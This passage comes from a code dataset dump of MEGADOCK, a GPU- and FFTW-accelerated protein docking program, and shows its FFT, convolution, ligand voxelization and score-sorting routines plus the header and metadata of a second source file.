(fftwf_complex*) fftwf_malloc(sizeof(fftwf_complex)*nf3);\n\n plan_fftw_forward=fftwf_plan_dft_3d(nf1,nf1,nf1,_FFTWin,_FFTWout,FFTW_FORWARD,FFTW_ESTIMATE);\n plan_fftw_inverse=fftwf_plan_dft_3d(nf1,nf1,nf1,_FFTWin,_FFTWout,FFTW_BACKWARD,FFTW_ESTIMATE);\n\n _exec_logger->record_malloc( sizeof(fftwf_complex)*nf3*2 );\n\n#endif\n return;\n}\n\n//============================================================================//\nvoid FFTProcessTable::receptor_fft(float *grid_r,float *grid_i)\n//============================================================================//\n{\n const int num_grid= _Num_fft / 2;\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n const int ndata = ( _Num_fft - num_grid ) / 2;\n const float theta = -2.0 * PI / _Num_fft;\n\n const int num_gpu = _parallel->num_gpu();\n const int nproc2 = _parallel->nproc2();\n\n if(num_gpu > 0) {\n#ifdef CUFFT\n int myid2 = omp_get_thread_num();\n struct timeval et1, et2;\n //memset(CUFFTin_host[0], make_cuComplex(0.0, 0.0), sizeof(cufftComplex)*nf3);\n for( int i = 0 ; i < nf3 ; i++ ) {\n CUFFTin_host[i] = make_cuComplex(0.0, 0.0);\n }\n\n for( int i = 0, m = 0 ; i < num_grid ; i++ ) {\n const int ic = _Num_fft*_Num_fft*(i+ndata);\n for( int j = 0 ; j < num_grid ; j++ ) {\n const int jc = ic + _Num_fft*(j+ndata);\n for( int k = 0 ; k < num_grid ; k++ ) {\n CUFFTin_host[jc+k+ndata] = make_cuComplex(grid_r[m ], grid_i[m]);\n m++;\n }\n }\n }\n\n cudaSetDevice(myid2 % num_gpu); //CUFFTin_dev[0] : [0] means 0th GPU\n\n gettimeofday(&et1,NULL);\n checkCudaErrors( cudaMemcpyAsync(CUFFTin_gpu, CUFFTin_host, sizeof(cufftComplex)*nf3, cudaMemcpyHostToDevice, _cuda_stream) );\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t6_data_transfer_rec += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n fft3d(theta); // [0] means performed on 0th GPU\n\n gettimeofday(&et1,NULL);\n checkCudaErrors( cudaMemcpyAsync(CUFFTout_host,CUFFTout_gpu,sizeof(cufftComplex)*nf3,cudaMemcpyDeviceToHost, _cuda_stream) );\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t6_data_transfer_rec += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n for( int i = 0 ; i < nf3 ; i++ ) {\n _FFT_rec_r[i] = cuCrealf(CUFFTout_host[i]);\n _FFT_rec_i[i] = cuCimagf(CUFFTout_host[i]);\n }\n\n gettimeofday(&et1,NULL);\n\n checkCudaErrors( cudaMemcpyAsync(_FFT_rec_r_gpu, _FFT_rec_r, sizeof(float)*nf3, cudaMemcpyHostToDevice, _cuda_stream) );\n checkCudaErrors( cudaMemcpyAsync(_FFT_rec_i_gpu, _FFT_rec_i, sizeof(float)*nf3, cudaMemcpyHostToDevice, _cuda_stream) );\n\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t6_data_transfer_rec += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n#endif\n } else {\n#ifndef CUFFT\n memset(_FFTWin, 0.0, sizeof(fftwf_complex)*nf3);\n\n for( int i = 0, m = 0 ; i < num_grid ; i++ ) {\n const int ic = _Num_fft*_Num_fft*(i+ndata);\n\n for( int j = 0 ; j < num_grid ; j++ ) {\n const int jc = ic + _Num_fft*(j+ndata);\n\n for( int k = 0 ; k < num_grid ; k++ ) {\n _FFTWin[jc+k+ndata][0] = grid_r[m ];\n _FFTWin[jc+k+ndata][1] = grid_i[m++];\n }\n }\n }\n\n fft3d(theta);\n\n for( int i = 0 ; i < nf3 ; i++ ) {\n _FFT_rec_r[i] = _FFTWout[i][0];\n _FFT_rec_i[i] = _FFTWout[i][1];\n }\n#endif\n }\n\n\n return;\n}\n\n#ifndef CUFFT\n//============================================================================//\nvoid FFTProcessTable::ligand_preparation(float *grid_r,float *grid_i)\n//============================================================================//\n{\n const int ng1 = _Num_fft / 
2;\n const int nf2 = _Num_fft * _Num_fft;\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n const int ndata = ( _Num_fft - ng1 ) / 2;\n \n memset(_FFTWin[0], 0.0, sizeof(fftwf_complex)*nf3);\n \n for( int i = 0, m = 0 ; i < ng1 ; i++ ) {\n const int ic = nf2*(i+ndata);\n\n for( int j = 0 ; j < ng1 ; j++ ) {\n int jc = ic + _Num_fft*(j+ndata);\n \n for( size_t k = 0, myijk=jc+ndata ; k < ng1 ; k++, myijk++ ) {\n _FFTWin[myijk][0] = grid_r[m ];\n _FFTWin[myijk][1] = grid_i[m++];\n }\n }\n }\n \n return;\n}\n\n//============================================================================//\nvoid FFTProcessTable::convolution()\n//============================================================================//\n{\n const int nf1 = _Num_fft;\n const int nf2 = nf1*nf1;\n const size_t nf3 = nf1*nf2;\n\n for( size_t i = 0, j=0 ; i < nf3 ; i++,j++ ) {\n _FFTWin[j][0] = _FFT_rec_r[i]*_FFTWout[j][0] + _FFT_rec_i[i]*_FFTWout[j][1];\n _FFTWin[j][1] = _FFT_rec_r[i]*_FFTWout[j][1] - _FFT_rec_i[i]*_FFTWout[j][0];\n }\n\n return;\n}\n#endif\n\n//============================================================================//\nvoid FFTProcessTable::fft3d(const float &theta)\n//============================================================================//\n{ \n const size_t nproc2 = _parallel->nproc2();\n const int num_gpu = _parallel->num_gpu();\n\n#ifdef CUFFT\n const int nf1 = _Num_fft;\n cufftHandle plan;\n cufftResult res;\n\n res = cufftPlan3d(&plan, nf1, nf1, nf1, CUFFT_C2C);\n cufftSetStream(plan, _cuda_stream);\n if(!res == CUFFT_SUCCESS) {\n cout << \"!fail to plan 3d FFT (DFT):\" << res << endl;\n exit(-1);\n }\n\n if( theta < 0.0 ) {\n res = cufftExecC2C(plan, CUFFTin_gpu, CUFFTout_gpu, CUFFT_FORWARD);\n } else {\n res = cufftExecC2C(plan, CUFFTin_gpu, CUFFTout_gpu, CUFFT_INVERSE);\n }\n\n if(!res == CUFFT_SUCCESS) {\n cout << \"!fail to exec 3d FFT(in fft3d()):\" << res << endl;\n exit(-1);\n }\n\n res = cufftDestroy(plan);\n#else\n struct timeval et3, et4;\n gettimeofday(&et3,NULL);\n if( _parameter->fft_library_type == 2 ) { \n } else {\n if( theta < 0.0 ) {\n fftwf_execute(plan_fftw_forward);\n } else {\n fftwf_execute(plan_fftw_inverse);\n }\n }\n gettimeofday(&et4,NULL);\n //printf(\" [FFT(host),%s] %10.5f\\n\\n\",((theta<0.0)?\"Forward\":\"Inverse\"),(et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6)));\n#endif\n\n return;\n}\n\n#ifndef CUFFT\n//============================================================================//\nvoid FFTProcessTable::score_sort()\n//============================================================================//\n{\n const int num_sort = _parameter->_Num_sort;\n const int nf2 = _Num_fft * _Num_fft;\n const int nf3 = _Num_fft * _Num_fft * _Num_fft;\n float temp_top_score;\n int temp_top_index;\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n _Select[i].score = -99999.0;\n }\n\n fftwf_complex *fftout;\n fftout = _FFTWout;\n \n if(num_sort!=1) {\n for( size_t i = 0,myi= 0 ; i < nf3 ; i++,myi++ ) {\n const float raw = fftout[myi][0] / nf3;\n if( raw < _Select[num_sort-1].score) continue;\n for( int j = 0 ; j < num_sort ; j++ ) {\n if( raw > _Select[j].score ) {\n for( int k = num_sort-1 ; k > j ; k-- ) {\n _Select[k] = _Select[k-1];\n }\n _Select[j].score = raw;\n _Select[j].index[1] = i / nf2;\n _Select[j].index[2] = (i / _Num_fft) % _Num_fft;\n _Select[j].index[3] = i % _Num_fft;\n break;\n }\n }\n }\n } else { // num_sort = 1, take only 1 score per angle\n temp_top_score = 0.0;\n temp_top_index = 0;\n for( size_t i = 0, myi=0 ; i < nf3 ; i++,myi++ ) {\n 
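// --- [editorial aside] ------------------------------------------------------
// The single-score-per-angle scan around this point is a plain argmax over
// the inverse-FFT output, followed by decomposing the flat index into
// (x,y,z) voxel offsets. A minimal, self-contained sketch of that pattern
// (names are illustrative, not MEGADOCK's API; MEGADOCK additionally divides
// the raw score by nf3 to normalize FFTW's unscaled inverse transform):
#include <cstddef>
struct BestPos { float score; int x, y, z; };
static BestPos argmax_translation(const float *raw, int nf1) {
    const std::size_t nf2 = (std::size_t)nf1 * nf1, nf3 = nf2 * nf1;
    float best = raw[0]; std::size_t best_i = 0;
    for (std::size_t i = 1; i < nf3; ++i)
        if (raw[i] > best) { best = raw[i]; best_i = i; }
    // Same index decomposition as _Select[0].index[1..3] in this function.
    return { best, (int)(best_i / nf2), (int)((best_i / nf1) % nf1), (int)(best_i % nf1) };
}
// Aside: the two "if(!res == CUFFT_SUCCESS)" checks in fft3d() above parse as
// "(!res) == 0" and only behave correctly because CUFFT_SUCCESS is 0;
// "if (res != CUFFT_SUCCESS)" would state the intent directly.
// --- [end editorial aside] ---------------------------------------------------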
const float raw = fftout[myi][0];\n if (temp_top_score < raw) {\n temp_top_score = raw;\n temp_top_index = i;\n }\n }\n _Select[0].score = temp_top_score / nf3;\n _Select[0].index[1] = temp_top_index / nf2;\n _Select[0].index[2] = (temp_top_index / _Num_fft) % _Num_fft;\n _Select[0].index[3] = temp_top_index % _Num_fft;\n }\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n //printf(\" top %d %f\\n\",i,_Select[i].score);\n _Select[i].index[0] = _Current_rot_angle_num;\n }\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n _Top[_Current_rot_angle_num*num_sort+i] = _Select[i];\n }\n\n return;\n}\n#endif\n\n#ifdef CUFFT\n//============================================================================//\nvoid FFTProcessTable::cuda_fft(float *grid_r,float *grid_i,float *grid_coord,float *atom_coord_rotated,float *theta, size_t myid2)\n//============================================================================//\n{\n const int nf1 = _Num_fft;\n const int nf2 = nf1 * nf1;\n const size_t nf3 = nf2 * nf1;\n const int num_gpu = _parallel->num_gpu();\n const size_t nproc2 = _parallel->nproc2();\n\n const int num_sort = _parameter->_Num_sort;\n const int na = _ligand->num_atoms();\n\n struct timeval et1, et2;\n struct timeval et3, et4;\n gettimeofday(&et1,NULL);\n\n float temp_top_score = -999999.0;\n int temp_top_index = -999999;\n\n const int nThreads = NUM_THREADS;\n const int nBlocks_nf3 = (nf3 + (nThreads-1)) / nThreads;\n if(nBlocks_nf3 * nThreads < nf3) {\n printf(\" nf3:%d, nBlocks_nf3:%d, nThreads:%d , nf3=nBlocks_nf3*nThreads\\n\",nf3,nBlocks_nf3,nThreads);\n fprintf(stderr, \" [ERROR] too large FFT size. nf3:%d, nBlocks_nf3:%d\\n\", nf3, nBlocks_nf3);\n exit(1);\n }\n\n cudaSetDevice(myid2 % num_gpu);\n //printf(\" #p10 [myid=%d]\\n\",myid2);\n\n ligand_voxelization_on_gpu(theta,myid2);\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t3_1_ligand_voxelization += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n gettimeofday(&et1,NULL);\n\n cufft_result = cufftExecC2C(cufft_plan, CUFFTin_gpu, CUFFTout_gpu, CUFFT_FORWARD);\n if(!cufft_result == CUFFT_SUCCESS) {\n cout << \"!fail to exec 3d FFT (DFT, Lig):\" << cufft_result << endl;\n exit(-1);\n }\n\n //*/\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t3_2_fftprocess_ligand_fft += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n gettimeofday(&et1,NULL);\n convolution_gpu<<<nBlocks_nf3, nThreads, 0, _cuda_stream>>>(nf3, _FFT_rec_r_gpu, _FFT_rec_i_gpu, CUFFTout_gpu, CUFFTin_gpu);\n\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t3_3_fftprocess_convolution += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n gettimeofday(&et1,NULL);\n\n cufft_result = cufftExecC2C(cufft_plan, CUFFTin_gpu, CUFFTout_gpu, CUFFT_INVERSE);\n if(!(cufft_result == CUFFT_SUCCESS)) {\n cout << \"!fail to exec 3d FFT (IDFT):\" << cufft_result << endl;\n exit(-1);\n }\n //*\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t3_4_fftprocess_fft_inverse += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n gettimeofday(&et1,NULL);\n\n // Search max score translation position from CUFFTout_gpu[nf3]\n\n //printf(\" t=%d per angle\\n\",num_sort);\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n _Select[i].score = -99999.0;\n }\n\n max_pos_single<<<nBlocks_nf3, 
nThreads, sizeof(float)*nThreads, _cuda_stream>>>(nf3, CUFFTout_gpu, top_score_gpu, top_index_gpu);\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n\n gettimeofday(&et3,NULL);\n checkCudaErrors( cudaMemcpyAsync(top_score_host,top_score_gpu,sizeof(float)*nBlocks_nf3,cudaMemcpyDeviceToHost, _cuda_stream) );\n checkCudaErrors( cudaMemcpyAsync(top_index_host,top_index_gpu,sizeof(int)*nBlocks_nf3,cudaMemcpyDeviceToHost, _cuda_stream) );\n gettimeofday(&et4,NULL);\n _exec_logger->_cputime->t6_data_transfer_in_loop += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n\n if(num_sort!=1) {\n for(int i=0; i<nBlocks_nf3; i++) {\n if(top_index_host[i]/nf2 > nf1 || top_index_host[i] < 0){\n top_score_host[i] = -99999.99;\n //printf(\" error, %d | score, %f \\n\", top_index_host[i]/nf2, top_score_host[i]);\n }\n const float raw = top_score_host[i];\n if( raw < _Select[num_sort-1].score) continue;\n for( int j = 0 ; j < num_sort ; j++ ) {\n if( raw > _Select[j].score ) {\n for( int k = num_sort-1 ; k > j ; k-- ) {\n _Select[k] = _Select[k-1];\n }\n const int index = top_index_host[i];\n _Select[j].score = raw;\n _Select[j].index[1] = index / nf2;\n _Select[j].index[2] = (index / _Num_fft) % _Num_fft;\n _Select[j].index[3] = index % _Num_fft;\n break;\n }\n }\n }\n\n } else { // num_sort = 1, select only 1 score per 1 ligand angle\n for(int i=0; i<nBlocks_nf3; i++) {\n if(top_index_host[i]/nf2 > nf1 || top_index_host[i] < 0){\n top_score_host[i] = -99999.99;\n //printf(\" error, %d | score, %f \\n\", top_index_host[i]/nf2, top_score_host[i]);\n }\n if(temp_top_score < top_score_host[i]) {\n temp_top_score = top_score_host[i];\n temp_top_index = top_index_host[i];\n }\n }\n\n //printf(\" m:%f\\n\\n\",temp_top_score);\n //printf(\"%g (%d) [%d %d %d]\\n\", temp_top_score, _p, temp_top_index/(n*n),(temp_top_index/n)%n, temp_top_index%n );\n //printf(\"<%d> %g (%d/%d) %d\\n\", nBlocks,temp_top_score, temp_top_index, nf3, temp_top_index/nf2);\n\n _Select[0].score = temp_top_score;\n _Select[0].index[1] = temp_top_index / nf2;\n _Select[0].index[2] = (temp_top_index / nf1) % nf1;\n _Select[0].index[3] = temp_top_index % nf1;\n /* / DEBUG\n printf(\"TEST, %d\\n\", _Select[0].index[1]);\n if ( _Select[0].index[1] > nf1 ){\n printf(\" error, %d\\n\", _Select[0].index[1]);\n }*/\n\n }\n\n //*** score_sort ***********************************************************\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n _Select[i].index[0] = _Current_rot_angle_num;\n _Top[_Current_rot_angle_num*num_sort+i] = _Select[i];\n }\n\n //size_t devmem_use, devmem_free, devmem_total;\n //cudaMemGetInfo(&devmem_free, &devmem_total);\n //devmem_use = devmem_total - devmem_free;\n //printf(\" [GPU (%d) memory] Use : %10u (%4.1f%%), Free : %10u (%4.1f%%), Total : %10u\\n\",myid2,devmem_use,(float)(100*devmem_use/devmem_total), devmem_free, (float)(100*devmem_free/devmem_total), devmem_total);\n\n\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t3_5_fftprocess_score_sort += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n return;\n}\n\n\n//============================================================================//\nvoid FFTProcessTable::ligand_voxelization_on_gpu(float *theta, size_t myid2)\n//============================================================================//\n{\n const int ng1 = _Num_fft / 2;\n const int ng3 = ng1 * ng1 * ng1;\n const int nf1 = _Num_fft;\n 
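// --- [editorial aside] ------------------------------------------------------
// cuda_fft() above uses a two-stage argmax: max_pos_single finds one
// candidate per thread block on the GPU, then the host merges the
// nBlocks_nf3 partial results. A minimal host-side merge sketch
// (illustrative names, not MEGADOCK's API):
#include <utility>
static std::pair<float, int> merge_block_maxima(const float *blk_score,
                                                const int *blk_index,
                                                int n_blocks) {
    float best = -999999.0f;   // same sentinels as temp_top_score/index above
    int best_idx = -999999;
    for (int b = 0; b < n_blocks; ++b)
        if (blk_score[b] > best) { best = blk_score[b]; best_idx = blk_index[b]; }
    return { best, best_idx };
}
// --- [end editorial aside] ---------------------------------------------------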
const int nf2 = nf1 * nf1;\n const size_t nf3 = nf2 * nf1;\n\n const float delta = 1.0;\n const float surface = 1.0;\n const float grid_width = _parameter->grid_width;\n const int sr_half = (2.4 + grid_width - 0.01) / grid_width;\n const int sr = 2 * sr_half + 1;\n\n const int na = _ligand->num_atoms();\n const int nag = na * ng1;\n const int na_sr3 = na * sr * sr * sr;\n\n struct timeval et1, et2;\n struct timeval et3, et4;\n\n const int nThreads = NUM_THREADS;\n //const int nBlocks_na = (na + (nThreads-1)) / nThreads;\n const int nBlocks_nag = (nag + (nThreads-1)) / nThreads;\n const int nBlocks_na_sr3 = (na_sr3 + (nThreads-1)) / nThreads;\n const int nBlocks_ng3 = (ng3 + (nThreads-1)) / nThreads;\n const int nBlocks_nf3 = (nf3 + (nThreads-1)) / nThreads;\n if(nBlocks_nf3 * nThreads < nf3) {\n printf(\" nf3:%d, nBlocks_nf3:%d, nThreads:%d , nf3=nBlocks_nf3*nThreads\\n\",nf3,nBlocks_nf3,nThreads);\n fprintf(stderr, \" [ERROR] too large FFT size. nf3:%d, nBlocks_nf3:%d\\n\", nf3, nBlocks_nf3);\n exit(1);\n }\n\n //*\n //transfer ligand angle & calc xd,yd,zd,atom_coord_rotated\n gettimeofday(&et3,NULL);\n\n gettimeofday(&et1,NULL);\n checkCudaErrors( cudaMemcpyAsync(ligand_rotation_angle_gpu, theta, sizeof(float)*3, cudaMemcpyHostToDevice, _cuda_stream) );\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t3_1_ligand_voxelization += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n //lig_rotation<<<nBlocks_na, nThreads, 0, _cuda_stream>>>(na, ligand_rotation_angle_gpu,atom_coord_orig_gpu, mole_center_coord_gpu, atom_coord_rotated_gpu);\n //checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n //lig_calc_dis_atomgrid<<<nBlocks_nag, nThreads, 0, _cuda_stream>>>(na, ng1, xd_gpu, yd_gpu, zd_gpu, grid_coord_gpu, atom_coord_rotated_gpu);\n //checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n ligvoxgpu_copy_htod<<<nBlocks_nag, nThreads, 0, _cuda_stream>>>\n (na, ligand_rotation_angle_gpu, ng1, atom_coord_orig_gpu, mole_center_coord_gpu, atom_coord_rotated_gpu, xd_gpu, yd_gpu, zd_gpu, grid_coord_gpu);\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et4,NULL);\n _exec_logger->_cputime->t3_1_1_ligvoxgpu_copy_htod += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //grid[] initialize\n gettimeofday(&et3,NULL);\n lig_vox_init<<<nBlocks_nf3, nThreads, 0, _cuda_stream>>>(ng3,nf3,grid_r_gpu,grid_i_gpu,CUFFTin_gpu);\n //lig_vox_init_fft<<<nBlocks_nf3, nThreads, 0, _cuda_stream>>>(nf3,CUFFTin_gpu);\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et4,NULL);\n _exec_logger->_cputime->t3_1_2_ligvoxgpu_kernel_init += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //atom fill(core)\n gettimeofday(&et3,NULL);\n lig_vox_fill<<<nBlocks_na_sr3, nThreads, 0, _cuda_stream>>>\n (ng1,na,delta,radius_core2_gpu,xd_gpu,yd_gpu,zd_gpu,grid_coord_gpu,atom_coord_rotated_gpu,grid_r_gpu, grid_width);\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et4,NULL);\n _exec_logger->_cputime->t3_1_3_ligvoxgpu_kernel_fill_core += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //surface cutting\n gettimeofday(&et3,NULL);\n lig_vox_surface_cut_CtoT<<<nBlocks_ng3, nThreads, 0, _cuda_stream>>>(ng1,delta,grid_r_gpu);\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et4,NULL);\n _exec_logger->_cputime->t3_1_4_ligvoxgpu_kernel_cut_surf += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //atom fill(surf)\n 
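// --- [editorial aside] ------------------------------------------------------
// Worked example of the search-radius arithmetic above, assuming
// grid_width = 1.2 A (an assumed, typical voxel pitch; not read from this
// file). Each atom's fill kernel then covers a 5x5x5 voxel neighborhood:
#include <cstdio>
int main() {
    const float grid_width = 1.2f;                                        // assumption
    const int sr_half = (int)((2.4f + grid_width - 0.01f) / grid_width);  // (int)2.99 = 2
    const int sr = 2 * sr_half + 1;                                       // 5
    std::printf("voxels per atom = %d\n", sr * sr * sr);                  // 125 -> na_sr3 = na*125
    return 0;
}
// --- [end editorial aside] ---------------------------------------------------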
gettimeofday(&et3,NULL);\n lig_vox_fill<<<nBlocks_na_sr3, nThreads, 0, _cuda_stream>>>\n (ng1,na,surface,radius_surf2_gpu,xd_gpu,yd_gpu,zd_gpu,grid_coord_gpu,atom_coord_rotated_gpu,grid_r_gpu, grid_width);\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et4,NULL);\n _exec_logger->_cputime->t3_1_5_ligvoxgpu_kernel_fill_surf += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //electro\n gettimeofday(&et3,NULL);\n\n if(_parameter->lig_elec_serial_flag == 0) {\n lig_vox_elec<<<nBlocks_ng3, nThreads, 0, _cuda_stream>>>(ng1, na, grid_width, _Charge_gpu, atom_coord_rotated_gpu, grid_i_gpu);\n } else {\n lig_vox_elec_serial<<<nBlocks_ng3, nThreads, 0, _cuda_stream>>>(ng1, na, grid_width, _Charge_gpu, atom_coord_rotated_gpu, grid_i_gpu);\n }\n\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et4,NULL);\n _exec_logger->_cputime->t3_1_6_ligvoxgpu_kernel_elec += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //set Voxel grid[ng3] into center of FFT grid[nf3]\n gettimeofday(&et3,NULL);\n ligand_voxel_set<<<nBlocks_ng3, nThreads, 0, _cuda_stream>>>(ng1,CUFFTin_gpu,grid_r_gpu,grid_i_gpu);\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et4,NULL);\n _exec_logger->_cputime->t3_1_7_ligvoxgpu_kernel_set_array += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n}\n\n\n//============================================================================//\nvoid FFTProcessTable::ligand_data_transfer_gpu(float *grid_coord)\n//============================================================================//\n{\n const int ng1 = _Num_fft / 2;\n const int na = _ligand->num_atoms();\n const int num_gpu = _parallel->num_gpu();\n const int nproc2 = _parallel->nproc2();\n const float rcore2 = 1.5; // ZDOCK parameter\n const float rsurf2 = 1.0; // ZDOCK parameter\n struct timeval et1, et2;\n\n float radius_core2[na];\n float radius_surf2[na];\n\n for(int i = 0; i < na; i++) {\n radius_core2[i] = _ligand->_Radius[i] * _ligand->_Radius[i] * rcore2;\n radius_surf2[i] = _ligand->_Radius[i] * _ligand->_Radius[i] * rsurf2;\n }\n\n gettimeofday(&et1,NULL);\n int myid2 = omp_get_thread_num();\n cudaSetDevice(myid2 % num_gpu);\n checkCudaErrors( cudaMemcpyAsync(radius_core2_gpu, radius_core2, sizeof(float)*na, cudaMemcpyHostToDevice, _cuda_stream) );\n checkCudaErrors( cudaMemcpyAsync(radius_surf2_gpu, radius_surf2, sizeof(float)*na, cudaMemcpyHostToDevice, _cuda_stream) );\n checkCudaErrors( cudaMemcpyAsync(_Charge_gpu, _ligand->_Charge, sizeof(float)*na, cudaMemcpyHostToDevice, _cuda_stream) );\n checkCudaErrors( cudaMemcpyAsync(grid_coord_gpu, grid_coord, sizeof(float)*ng1, cudaMemcpyHostToDevice, _cuda_stream) );\n checkCudaErrors( cudaMemcpyAsync(atom_coord_orig_gpu, _ligand->_Coordinate, sizeof(float)*na*3, cudaMemcpyHostToDevice, _cuda_stream) );\n checkCudaErrors( cudaMemcpyAsync(mole_center_coord_gpu, _ligand->_Center, sizeof(float)*3, cudaMemcpyHostToDevice, _cuda_stream) );\n\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t6_data_transfer_lig += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n return;\n}\n\n#endif /* CUFFT */\n\n\n\n//============================================================================//\nvoid FFTProcessTable::fft_memory_free()\n//============================================================================//\n{\n const size_t nproc2 = _parallel->nproc2();\n const int num_gpu = _parallel->num_gpu();\n const size_t nf3 = _Num_fft * 
_Num_fft * _Num_fft;\n\n#ifndef CUFFT\n fftwf_destroy_plan(plan_fftw_forward);\n fftwf_destroy_plan(plan_fftw_inverse);\n\n _exec_logger->record_free(sizeof(float)*nf3*2);\n\n#else\n\n //const int num_sort = _parameter->_Num_sort;\n const int nThreads = NUM_THREADS;\n const int nBlocks_nf3 = (nf3 + (nThreads-1)) / nThreads;\n\n int myid2 = omp_get_thread_num();\n cudaSetDevice(myid2 % num_gpu);\n\n cufftDestroy(cufft_plan);\n\n checkCudaErrors( cudaStreamDestroy(_cuda_stream));\n\n checkCudaErrors( cudaFree(CUFFTin_gpu));\n checkCudaErrors( cudaFree(CUFFTout_gpu));\n checkCudaErrors( cudaFree(_FFT_rec_r_gpu));\n checkCudaErrors( cudaFree(_FFT_rec_i_gpu));\n\n\n checkCudaErrors( cudaFree(grid_r_gpu));\n checkCudaErrors( cudaFree(grid_i_gpu));\n checkCudaErrors( cudaFree(grid_coord_gpu));\n\n checkCudaErrors( cudaFree(radius_core2_gpu));\n checkCudaErrors( cudaFree(radius_surf2_gpu));\n checkCudaErrors( cudaFree(_Charge_gpu));\n\n checkCudaErrors( cudaFree(xd_gpu));\n checkCudaErrors( cudaFree(yd_gpu));\n\n checkCudaErrors( cudaFree(zd_gpu));\n\n checkCudaErrors( cudaFree(atom_coord_rotated_gpu));\n checkCudaErrors( cudaFree(atom_coord_orig_gpu));\n checkCudaErrors( cudaFree(mole_center_coord_gpu));\n checkCudaErrors( cudaFree(ligand_rotation_angle_gpu));\n\n checkCudaErrors( cudaFree(top_score_gpu));\n checkCudaErrors( cudaFree(top_index_gpu));\n\n delete [] top_score_host;\n delete [] top_index_host;\n\n\n _exec_logger->record_free( sizeof(float)*nBlocks_nf3 + sizeof(int)*nBlocks_nf3 );\n\n#endif\n\n return;\n}\n" }, { "alpha_fraction": 0.4765363037586212, "alphanum_fraction": 0.4975791573524475, "avg_line_length": 31.25225257873535, "blob_id": "7cfe16266b7743916e9e356fea646bd0e0a22398", "content_id": "a951b4b178960fb8bdb88e33c65b514a868e59ec", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 10740, "license_type": "permissive", "max_line_length": 247, "num_lines": 333, "path": "/megadock-scfa20/control_pdb.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ControlPDB\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"control_pdb.h\"\n\n//============================================================================//\nvoid ControlPDB::initialize(int argc,char *argv[])\n//============================================================================//\n{\n int ngrid;\n vector<int> ngrid_table;\n\n struct timeval et1, et2;\n gettimeofday(&et1,NULL);\n\n // ParameterPDB\n _parameter = new ParameterPDB(_parallel);\n _parameter->initialize(argc,argv);\n _cputime->record_malloc( sizeof(float)*_parameter->_Num_rot_angles*3 + sizeof(unordered_map<string,float>)*(_parameter->_Charmmr.size() + _parameter->_Charmmc.size() + _parameter->_ACE.size()) ); //Rotation angles[], Atom radius, charge, ACE[]\n\n // Number of 